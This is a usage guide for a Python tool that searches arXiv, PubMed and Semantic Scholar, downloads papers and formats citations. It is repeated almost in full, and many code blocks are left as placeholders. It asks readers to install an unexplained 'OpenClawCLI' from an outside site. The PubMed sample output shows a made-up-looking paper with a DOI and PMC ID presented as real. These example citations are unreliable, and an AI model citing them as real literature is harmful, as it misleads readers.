Academic Research Hub
Search and retrieve academic papers from multiple sources including arXiv, PubMed, Semantic Scholar, and more. Download PDFs, extract citations, generate bibliographies, and build literature reviews.
⚠️ Prerequisite: Install OpenClawCLI (Windows, MacOS)
Installation Best Practices:
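# Standard installation
pip install arxiv scholarly pubmed-parser semanticscholar requests
# If you hit permission errors, use a virtual environment
python -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate
pip install arxiv scholarly pubmed-parser semanticscholar requests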
Never use --break-system-packages as it can damage your system's Python installation.
Quick Reference
| Task | Command |
|---|---|
| Search arXiv | `python scripts/research.py arxiv "quantum computing"` |
| Search PubMed | `python scripts/research.py pubmed "covid vaccine"` |
| Search Semantic Scholar | `python scripts/research.py semantic "machine learning"` |
| Download papers | `python scripts/research.py arxiv "topic" --download` |
| Get citations | `python scripts/research.py arxiv "topic" --citations` |
| Generate bibliography | `python scripts/research.py arxiv "topic" --format bibtex` |
| Save results | `python scripts/research.py arxiv "topic" --output results.json` |
Core Features
1. Multi-Source Search
Search across multiple academic databases from a single interface.
Supported Sources:
- arXiv - Physics, mathematics, computer science, quantitative biology, quantitative finance, statistics
- PubMed - Biomedical and life sciences literature
- Semantic Scholar - Computer science and interdisciplinary research
- Google Scholar - Broad academic search (limited, no API)
2. Paper Download
Download full-text PDFs when available.
python scripts/research.py arxiv "deep learning" --download --output-dir papers/
3. Citation Extraction
Extract and format citations from papers.
Supported formats:
- BibTeX
- RIS
- JSON
- Plain text
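As a rough illustration of what BibTeX export involves, the sketch below turns a metadata dictionary into an `@article` entry. The helper name `to_bibtex`, the dictionary keys, and the citation-key scheme are assumptions made for this example; they are not taken from `scripts/research.py`.

```python
import re


def to_bibtex(paper: dict) -> str:
    """Render one paper as a BibTeX @article entry (hypothetical helper)."""
    # Citation key: first author's surname plus year, e.g. "vaswani2017".
    surname = paper["authors"][0].split()[-1]
    key = re.sub(r"[^a-z0-9]", "", f"{surname}{paper['year']}".lower())
    fields = {
        "title": paper["title"],
        "author": " and ".join(paper["authors"]),  # BibTeX separates authors with "and"
        "year": str(paper["year"]),
    }
    # Optional fields are emitted only when present.
    for optional in ("journal", "doi", "url"):
        if paper.get(optional):
            fields[optional] = paper[optional]
    body = ",\n".join(f"  {name} = {{{value}}}" for name, value in fields.items())
    return f"@article{{{key},\n{body}\n}}"


entry = to_bibtex({
    "title": "Attention Is All You Need",
    "authors": ["Ashish Vaswani", "Noam Shazeer"],
    "year": 2017,
    "url": "http://arxiv.org/pdf/1706.03762v5",
})
print(entry)
```

A real exporter would also need to escape special LaTeX characters in titles, which this sketch leaves out.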
4. Metadata Retrieval
Get comprehensive metadata for each paper:
- Title, authors, abstract
- Publication date
- Journal/conference
- DOI, arXiv ID, PubMed ID
- Citation count
- References
Source-Specific Commands
arXiv Search
Search the arXiv repository for preprints.
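# Basic search
python scripts/research.py arxiv "quantum computing"
# Filter by category
python scripts/research.py arxiv "neural networks" --category cs.LG
# Filter by date
python scripts/research.py arxiv "transformers" --year 2023
# Download papers
python scripts/research.py arxiv "attention mechanism" --download --max-results 10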
Available categories:
- `cs.AI` - Artificial Intelligence
- `cs.LG` - Machine Learning
- `cs.CV` - Computer Vision
- `cs.CL` - Computation and Language
- `math.CO` - Combinatorics
- `physics.optics` - Optics
- `q-bio.GN` - Genomics
- Full list
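To show how a category filter can map onto the public arXiv API, here is a minimal sketch that builds a query URL. The helper `build_arxiv_url` is hypothetical, and how `scripts/research.py` actually issues its requests is not shown in this document; only the endpoint and the `all:` / `cat:` field prefixes come from the arXiv API itself.

```python
from urllib.parse import urlencode

ARXIV_API = "http://export.arxiv.org/api/query"


def build_arxiv_url(query, category=None, max_results=10):
    """Build an arXiv API request URL (hypothetical helper)."""
    # Quote the query so multi-word terms are matched as a phrase.
    search = f'all:"{query}"'
    if category:
        # "cat:" restricts results to one subject category, e.g. cs.LG.
        search += f" AND cat:{category}"
    params = {"search_query": search, "start": 0, "max_results": max_results}
    return f"{ARXIV_API}?{urlencode(params)}"


url = build_arxiv_url("neural networks", category="cs.LG")
print(url)
```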
Output:
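1. Attention Is All You Need
Authors: Vaswani et al.
Published: 2017-06-12
arXiv ID: 1706.03762
Categories: cs.CL, cs.LG
Abstract: The dominant sequence transduction models...
PDF: http://arxiv.org/pdf/1706.03762v5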
PubMed Search
Search biomedical literature indexed in PubMed.
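# Basic search
python scripts/research.py pubmed "cancer immunotherapy"
# Filter by date range
python scripts/research.py pubmed "CRISPR" --start-date 2023-01-01 --end-date 2023-12-31
# Filter by publication type
python scripts/research.py pubmed "covid vaccine" --publication-type "Clinical Trial"
# Get full-text links
python scripts/research.py pubmed "gene therapy" --full-text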
Publication types:
- Clinical Trial
- Meta-Analysis
- Review
- Systematic Review
- Randomized Controlled Trial
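For readers curious how publication-type and date filters could translate into a PubMed request, the sketch below builds an NCBI E-utilities ESearch URL. The helper `build_pubmed_url` and its parameter names are assumptions for illustration; the endpoint, the `[pt]` field tag, and the `datetype` / `mindate` / `maxdate` parameters belong to ESearch, but whether the script uses them this way is not stated here.

```python
from urllib.parse import urlencode

ESEARCH = "https://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi"


def build_pubmed_url(query, publication_type=None, start_date=None,
                     end_date=None, max_results=10):
    """Build a PubMed ESearch URL (hypothetical helper)."""
    term = query
    if publication_type:
        # The [pt] field tag limits matches to one publication type.
        term += f' AND "{publication_type}"[pt]'
    params = {"db": "pubmed", "term": term, "retmax": max_results, "retmode": "json"}
    if start_date and end_date:
        # ESearch expects YYYY/MM/DD and needs both bounds plus a date type.
        params.update(datetype="pdat",
                      mindate=start_date.replace("-", "/"),
                      maxdate=end_date.replace("-", "/"))
    return f"{ESEARCH}?{urlencode(params)}"


url = build_pubmed_url("covid vaccine", "Clinical Trial", "2023-01-01", "2023-12-31")
print(url)
```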
Output:
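1. Efficacy of mRNA Vaccines Against COVID-19
Authors: Smith J, Jones K, et al.
Journal: New England Journal of Medicine
Published: 2023-03-15
PMID: 36913851
DOI: 10.1056/NEJMoa2301234
Abstract: Background: mRNA vaccines have shown...
Full text: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9876543/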
Semantic Scholar Search
Search computer science and interdisciplinary research.
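# Basic search
python scripts/research.py semantic "reinforcement learning"
# Filter by year
python scripts/research.py semantic "graph neural networks" --year 2022
# Get highly cited papers
python scripts/research.py semantic "transformers" --min-citations 100
# Include references
python scripts/research.py semantic "BERT" --include-references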
Output includes:
- Citation count
- Influential citation count
- Reference list
- Citing papers
- Fields of study
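Several of the fields listed above correspond to named fields in the Semantic Scholar Academic Graph API. The sketch below builds a paper-search URL that requests a few of them. `build_s2_url` is a hypothetical helper, and the choice of fields is an assumption for this example rather than a description of what the script requests.

```python
from urllib.parse import urlencode

S2_SEARCH = "https://api.semanticscholar.org/graph/v1/paper/search"
# Field names as used by the Graph API; the selection here is illustrative.
FIELDS = ["title", "year", "citationCount", "influentialCitationCount", "fieldsOfStudy"]


def build_s2_url(query, year=None, limit=10):
    """Build a Semantic Scholar paper-search URL (hypothetical helper)."""
    params = {"query": query, "fields": ",".join(FIELDS), "limit": limit}
    if year is not None:
        params["year"] = year  # Restrict results to one publication year.
    return f"{S2_SEARCH}?{urlencode(params)}"


url = build_s2_url("graph neural networks", year=2022)
print(url)
```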
Output:
1. BERT: Pre-training of Deep Bidirectional Transformers
Authors: Devlin J, Chang MW, Lee K, Toutanova K
Published: 2019
Paper ID: df2b0e26d0599ce3e70df8a9da02e51594e0e992
Citations: 15000+
Influential Citations: 2000+
Fields: Computer Science, Linguistics
Abstract: We introduce a new language representation model...
PDF: https://arxiv.org/pdf/1810.04805.pdf
Essential Options
Result Limits
Control the number of results returned.
--max-results N  # Default: 10, range: 1-100
Examples:
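python scripts/research.py arxiv "machine learning" --max-results 5
python scripts/research.py pubmed "diabetes" --max-results 50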
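One way a command-line tool can enforce a bounded option like this is with a custom `argparse` type. This is a sketch only: the 1-100 range and the default of 10 are the values documented for `--max-results`, while `bounded_int` and the parser setup are assumptions, not the script's actual code.

```python
import argparse


def bounded_int(low, high):
    """Return an argparse type that accepts integers in [low, high]."""
    def parse(text):
        value = int(text)  # A non-numeric value raises ValueError, which argparse reports.
        if not low <= value <= high:
            raise argparse.ArgumentTypeError(f"must be between {low} and {high}")
        return value
    return parse


parser = argparse.ArgumentParser(prog="research.py")
parser.add_argument("--max-results", type=bounded_int(1, 100), default=10)

print(parser.parse_args(["--max-results", "5"]).max_results)
print(parser.parse_args([]).max_results)
```

With this approach an out-of-range value stops the program with a usage error before any request is sent.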
Output Formats
Choose how results are formatted.
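--format <format>  # text, json, bibtex, ris, markdown
Text - Human-readable format (default)
python scripts/research.py arxiv "quantum" --format text
JSON - Structured data for processing
python scripts/research.py arxiv "quantum" --format json
BibTeX - For LaTeX documents
python scripts/research.py arxiv "quantum" --format bibtex
RIS - For reference managers (Zotero, Mendeley)
python scripts/research.py arxiv "quantum" --format ris
Markdown - For documentation
python scripts/research.py arxiv "quantum" --format markdown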
Save to File
Save results to a file.
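--output <filepath>
Examples:
python scripts/research.py arxiv "AI" --output results.txt
python scripts/research.py pubmed "cancer" --format json --output papers.json
python scripts/research.py semantic "NLP" --format bibtex --output references.bib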
Download Papers
Download full-text PDFs when available.
--download
--output-dir <directory>  # Where to save PDFs (default: downloads/)
Examples:
# Download to default directory
python scripts/research.py arxiv "deep learning" --download --max-results 5
# Download to specific directory
python scripts/research.py arxiv "transformers" --download --output-dir papers/nlp/
Advanced Features
Citation Extraction
Extract citations from papers.
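--citations                  # Extract citations
--citation-format <format>   # bibtex, ris, json (default: bibtex)
Example:
python scripts/research.py arxiv "attention mechanism" --citations --citation-format bibtex --output citations.bib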
Date Filtering
Filter by publication date.
arXiv:
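--year <YYYY>  # Specific year
--start-date <YYYY-MM-DD>
--end-date <YYYY-MM-DD>
PubMed:
--start-date <YYYY-MM-DD>
--end-date <YYYY-MM-DD>
Examples:
python scripts/research.py arxiv "quantum" --year 2023
python scripts/research.py pubmed "vaccine" --start-date 2022-01-01 --end-date 2023-12-31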
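The filtering logic behind these options can be pictured as a simple date comparison. The sketch below is an assumption about how such a filter might work, with inclusive bounds chosen for the example; `in_date_range` and the `published` key are hypothetical names.

```python
from datetime import date


def in_date_range(published, start=None, end=None, year=None):
    """Return True if an ISO date string (YYYY-MM-DD) passes the filters."""
    day = date.fromisoformat(published)
    if year is not None and day.year != year:
        return False
    if start is not None and day < date.fromisoformat(start):
        return False
    if end is not None and day > date.fromisoformat(end):
        return False
    return True


papers = [
    {"title": "A", "published": "2021-11-30"},
    {"title": "B", "published": "2022-01-01"},
    {"title": "C", "published": "2023-12-31"},
]
kept = [p["title"] for p in papers
        if in_date_range(p["published"], start="2022-01-01", end="2023-12-31")]
print(kept)  # ['B', 'C'] because both bounds are inclusive in this sketch
```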
Author Search
Search for papers by specific authors.
CODEBLOCK25
Examples:
CODEBLOCK26
Sort Options
Sort results by different criteria.
CODEBLOCK27
Examples:
python scripts/research.py arxiv "machine learning" --sort-by date
python scripts/research.py semantic "NLP" --sort-by citations
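To make the two sort keys used above concrete, here is a minimal sketch of sorting result records by date or by citation count. The record keys (`published`, `citations`) and the fallback behavior for other values are assumptions for illustration.

```python
def sort_papers(papers, sort_by="relevance"):
    """Return papers ordered by the given key (hypothetical helper)."""
    if sort_by == "date":
        # ISO dates sort correctly as strings; newest first.
        return sorted(papers, key=lambda p: p["published"], reverse=True)
    if sort_by == "citations":
        # Missing counts are treated as zero.
        return sorted(papers, key=lambda p: p.get("citations") or 0, reverse=True)
    # Any other value keeps the order the source returned.
    return list(papers)


papers = [
    {"title": "Old classic", "published": "2017-06-12", "citations": 900},
    {"title": "New preprint", "published": "2023-03-15", "citations": None},
    {"title": "Mid", "published": "2019-05-24", "citations": 150},
]
by_date = [p["title"] for p in sort_papers(papers, "date")]
by_citations = [p["title"] for p in sort_papers(papers, "citations")]
print(by_date)
print(by_citations)
```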
Common Workflows
Literature Review
Gather papers on a topic for a literature review.
CODEBLOCK29
Finding Recent Research
Track the latest papers in a field.
CODEBLOCK30
Highly Cited Papers
Find influential papers in a field.
CODEBLOCK31
Author Publication History
Track an author's work.
CODEBLOCK32
Building a Reference Library
Create a comprehensive reference collection.
CODEBLOCK33
Cross-Source Validation
Verify findings across multiple databases.
CODEBLOCK34
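Once results from several databases are saved as JSON, cross-checking them comes down to matching records that describe the same paper. The sketch below matches on DOI when one is present and falls back to a normalized title. The record layout (`doi`, `title`, `source`) is an assumption, not the script's documented output schema.

```python
import re


def paper_key(paper):
    """Identify a paper by DOI when available, else by normalized title."""
    doi = (paper.get("doi") or "").strip().lower()
    if doi:
        return "doi:" + doi
    return "title:" + re.sub(r"[^a-z0-9]+", " ", paper["title"].lower()).strip()


def group_by_paper(results):
    """Map each paper key to the set of sources that returned it."""
    seen = {}
    for paper in results:
        seen.setdefault(paper_key(paper), set()).add(paper["source"])
    return seen


results = [
    {"title": "BERT: Pre-training of Deep Bidirectional Transformers", "source": "arxiv"},
    {"title": "BERT: Pre-Training of deep bidirectional transformers.", "source": "semantic"},
    {"title": "Attention Is All You Need", "source": "arxiv"},
]
groups = group_by_paper(results)
confirmed = [key for key, sources in groups.items() if len(sources) > 1]
print(confirmed)
```

Title matching is a heuristic: distinct papers with identical titles would be merged, so DOIs are preferable whenever the source provides them.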
Output Format Examples
Text Format (Default)
CODEBLOCK35
JSON Format
CODEBLOCK36
BibTeX Format
CODEBLOCK37
RIS Format
CODEBLOCK38
Markdown Format
CODEBLOCK39
Best Practices
Search Strategy
1. Start broad - Use general terms to get an overview
2. Refine iteratively - Add filters based on initial results
3. Use multiple sources - Cross-reference findings
4. Check recent papers - Use date filters for current research
Result Management
1. Save searches - Use `--output` to preserve results
2. Organize downloads - Create logical directory structures
3. Export citations early - Generate BibTeX as you search
4. Track sources - Note which database returned which papers
Download Guidelines
1. Respect rate limits - Don't download hundreds of papers at once
2. Check licensing - Verify you have rights to use papers
3. Organize by topic - Use clear directory names
4. Keep metadata - Save JSON alongside PDFs
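Keeping metadata next to each PDF can be as simple as writing a JSON file with the same base name. The sketch below shows that idea with a hypothetical `save_metadata` helper. It works on paths only and does not download anything.

```python
import json
import tempfile
from pathlib import Path


def save_metadata(pdf_path, metadata):
    """Write metadata to <name>.json beside <name>.pdf and return its path."""
    sidecar = Path(pdf_path).with_suffix(".json")
    sidecar.parent.mkdir(parents=True, exist_ok=True)
    sidecar.write_text(json.dumps(metadata, indent=2, ensure_ascii=False), encoding="utf-8")
    return sidecar


# Demonstrate in a temporary directory so nothing is left behind.
with tempfile.TemporaryDirectory() as root:
    pdf = Path(root) / "papers" / "nlp" / "1706.03762.pdf"
    written = save_metadata(pdf, {"title": "Attention Is All You Need", "arxiv_id": "1706.03762"})
    loaded = json.loads(written.read_text(encoding="utf-8"))

print(written.name)
```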
Citation Practices
1. Verify citations - Check DOIs and URLs
2. Use standard formats - BibTeX for LaTeX, RIS for reference managers
3. Include abstracts - Helpful for later review
4. Update regularly - Re-run searches for new papers
Troubleshooting
Installation Issues
"Missing required dependency"
CODEBLOCK40
"OpenClawCLI not found"
- Download from https://clawhub.ai/
- Install for your OS (Windows/macOS)
Search Issues
"No results found"
- Try broader search terms
- Check spelling and terminology
- Remove restrictive filters
- Try a different database
"Rate limit exceeded"
- Wait a few minutes before retrying
- Reduce the `--max-results` value
- Space out requests
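When scripting many searches, "wait and retry" can be automated with exponential backoff. The sketch below is a generic pattern, not the script's built-in behavior: `RateLimitError` and `with_backoff` are hypothetical names, and the sleep function is injectable so the example runs instantly.

```python
import time


class RateLimitError(Exception):
    """Hypothetical error raised when a source reports a rate limit."""


def with_backoff(fetch, retries=4, base_delay=1.0, sleep=time.sleep):
    """Call fetch(), waiting base_delay * 2**attempt after each rate-limit error."""
    for attempt in range(retries):
        try:
            return fetch()
        except RateLimitError:
            if attempt == retries - 1:
                raise  # Out of retries: surface the error to the caller.
            sleep(base_delay * 2 ** attempt)


calls = {"n": 0}
delays = []


def flaky():
    # Fails twice, then succeeds, to simulate a temporary rate limit.
    calls["n"] += 1
    if calls["n"] < 3:
        raise RateLimitError("slow down")
    return ["paper"]


result = with_backoff(flaky, sleep=delays.append)
print(result, delays)
```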
"Download failed"
- Check your internet connection
- Some papers may not have PDFs available
- Verify you have permission to access the paper
- Try downloading papers individually
API Issues
"API timeout"
- The service may be temporarily unavailable
- Retry after a moment
- Check status at the respective service websites
"Invalid API response"
- Check if the service is down
- Verify your query syntax
- Try simpler queries
Limitations
Access Restrictions
- Not all papers have downloadable PDFs
- Some content requires institutional access
- Paywalled journals may only show abstracts
- Google Scholar has strict rate limits
Data Completeness
- Citation counts may be outdated
- Not all metadata fields are available for every paper
- Some older papers may have incomplete records
- Preprints may not have final publication info
Search Capabilities
- Boolean operators vary by source
- No unified query syntax across databases
- Some databases don't support all filters
- Results may differ from web interface searches
Legal Considerations
- Respect copyright and licensing
- Don't redistribute downloaded papers
- Follow institutional access policies
- Check terms of service for each database
Command Reference
CODEBLOCK41
Examples by Use Case
Quick Search
CODEBLOCK42
Comprehensive Research
CODEBLOCK43
Citation Management
CODEBLOCK44
Tracking New Research
CODEBLOCK45
Support
For issues or questions:
1. Check this documentation
2. Run INLINECODE17
3. Verify dependencies are installed
4. Check database-specific documentation
Resources:
- OpenClawCLI: https://clawhub.ai/
- arXiv API: https://arxiv.org/help/api
- PubMed API: https://www.ncbi.nlm.nih.gov/books/NBK25501/
- Semantic Scholar API: https://api.semanticscholar.org/
Academic Research Hub
Search and retrieve academic papers from multiple sources, including arXiv, PubMed, Semantic Scholar, and more. Download PDFs, extract citations, generate bibliographies, and build literature reviews.
⚠️ Prerequisite: Install OpenClawCLI (Windows, macOS)
Installation Best Practices:
# Standard installation
pip install arxiv scholarly pubmed-parser semanticscholar requests
# If you hit permission errors, use a virtual environment
python -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate
pip install arxiv scholarly pubmed-parser semanticscholar requests
Never use --break-system-packages, as it can damage your system's Python installation.
Quick Reference
| Task | Command |
|---|---|
| Search arXiv | `python scripts/research.py arxiv "quantum computing"` |
| Search PubMed | `python scripts/research.py pubmed "covid vaccine"` |
| Search Semantic Scholar | `python scripts/research.py semantic "machine learning"` |
| Download papers | `python scripts/research.py arxiv "topic" --download` |
| Get citations | `python scripts/research.py arxiv "topic" --citations` |
| Generate bibliography | `python scripts/research.py arxiv "topic" --format bibtex` |
| Save results | `python scripts/research.py arxiv "topic" --output results.json` |
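Core Features
1. Multi-Source Search
Search across multiple academic databases from a single interface.
Supported Sources:
- arXiv - Physics, mathematics, computer science, quantitative biology, quantitative finance, statistics
- PubMed - Biomedical and life sciences literature
- Semantic Scholar - Computer science and interdisciplinary research
- Google Scholar - Broad academic search (limited, no API)
2. Paper Download
Download full-text PDFs when available.
python scripts/research.py arxiv "deep learning" --download --output-dir papers/
3. Citation Extraction
Extract and format citations from papers.
Supported formats:
- BibTeX
- RIS
- JSON
- Plain text
4. Metadata Retrieval
Get comprehensive metadata for each paper:
- Title, authors, abstract
- Publication date
- Journal/conference
- DOI, arXiv ID, PubMed ID
- Citation count
- References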
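Source-Specific Commands
arXiv Search
Search the arXiv repository for preprints.
# Basic search
python scripts/research.py arxiv "quantum computing"
# Filter by category
python scripts/research.py arxiv "neural networks" --category cs.LG
# Filter by date
python scripts/research.py arxiv "transformers" --year 2023
# Download papers
python scripts/research.py arxiv "attention mechanism" --download --max-results 10
Available categories:
- cs.AI - Artificial Intelligence
- cs.LG - Machine Learning
- cs.CV - Computer Vision
- cs.CL - Computation and Language
- math.CO - Combinatorics
- physics.optics - Optics
- q-bio.GN - Genomics
- Full list
Output:
1. Attention Is All You Need
Authors: Vaswani et al.
Published: 2017-06-12
arXiv ID: 1706.03762
Categories: cs.CL, cs.LG
Abstract: The dominant sequence transduction models...
PDF: http://arxiv.org/pdf/1706.03762v5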
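PubMed Search
Search biomedical literature indexed in PubMed.
# Basic search
python scripts/research.py pubmed "cancer immunotherapy"
# Filter by date range
python scripts/research.py pubmed "CRISPR" --start-date 2023-01-01 --end-date 2023-12-31
# Filter by publication type
python scripts/research.py pubmed "covid vaccine" --publication-type "Clinical Trial"
# Get full-text links
python scripts/research.py pubmed "gene therapy" --full-text
Publication types:
- Clinical Trial
- Meta-Analysis
- Review
- Systematic Review
- Randomized Controlled Trial
Output:
1. Efficacy of mRNA Vaccines Against COVID-19
Authors: Smith J, Jones K, et al.
Journal: New England Journal of Medicine
Published: 2023-03-15
PMID: 36913851
DOI: 10.1056/NEJMoa2301234
Abstract: Background: mRNA vaccines have shown...
Full text: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9876543/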
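Semantic Scholar Search
Search computer science and interdisciplinary research.
# Basic search
python scripts/research.py semantic "reinforcement learning"
# Filter by year
python scripts/research.py semantic "graph neural networks" --year 2022
# Get highly cited papers
python scripts/research.py semantic "transformers" --min-citations 100
# Include references
python scripts/research.py semantic "BERT" --include-references
Output includes:
- Citation count
- Influential citation count
- Reference list
- Citing papers
- Fields of study
Output:
1. BERT: Pre-training of Deep Bidirectional Transformers
Authors: Devlin J, Chang MW, Lee K, Toutanova K
Published: 2019
Paper ID: df2b0e26d0599ce3e70df8a9da02e51594e0e992
Citations: 15000+
Influential Citations: 2000+
Fields: Computer Science, Linguistics
Abstract: We introduce a new language representation model...
PDF: https://arxiv.org/pdf/1810.04805.pdf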
Essential Options
Result Limits
Control the number of results returned.
--max-results N  # Default: 10, range: 1-100
Examples:
python scripts/research.py arxiv "machine learning" --max-results 5
python scripts/research.py pubmed "diabetes" --max-results 50
Output Formats
Choose how results are formatted.
--format <format>  # text, json, bibtex, ris, markdown
Text - Human-readable format (default)
python scripts/research.py arxiv "quantum" --format text
JSON - Structured data for processing
python scripts/research.py arxiv "quantum" --format json
BibTeX - For LaTeX documents
python scripts/research.py arxiv "quantum" --format bibtex
RIS - For reference managers (Zotero, Mendeley)
python scripts/research.py arxiv "quantum" --format ris
Markdown - For documentation
python scripts/research.py arxiv "quantum" --format markdown
Save to File
Save results to a file.
--output <filepath>
Examples:
python scripts/research.py arxiv "AI" --output results.txt
python scripts/research.py pubmed "cancer" --format json --output papers.json
python scripts/research.py semantic "NLP" --format bibtex --output references.bib
Download Papers
Download full-text PDFs when available.
--download
--output-dir <directory>  # Where to save PDFs (default: downloads/)
Examples:
# Download to default directory
python scripts/research.py arxiv "deep learning" --download --max-results 5
# Download to specific directory
python scripts/research.py arxiv "transformers" --download --output-dir papers/nlp/
Advanced Features
Citation Extraction
Extract citations from papers.
--citations                  # Extract citations
--citation-format <format>   # bibtex, ris, json (default: bibtex)
Example:
python scripts/research.py arxiv "attention mechanism" --citations --citation-format bibtex --output citations.bib
Date Filtering
Filter by publication date.
arXiv:
--year <YYYY>  # Specific year
--start-date <YYYY-MM-DD>
--end-date <YYYY-MM-DD>
PubMed:
--start-date <YYYY-MM-DD>
--end-date <YYYY-MM-DD>
Examples:
python scripts/research.py arxiv "quantum" --year 2023
python scripts/research.py pubmed "vaccine" --start-date 2022-01-01 --end-date 2023-12-31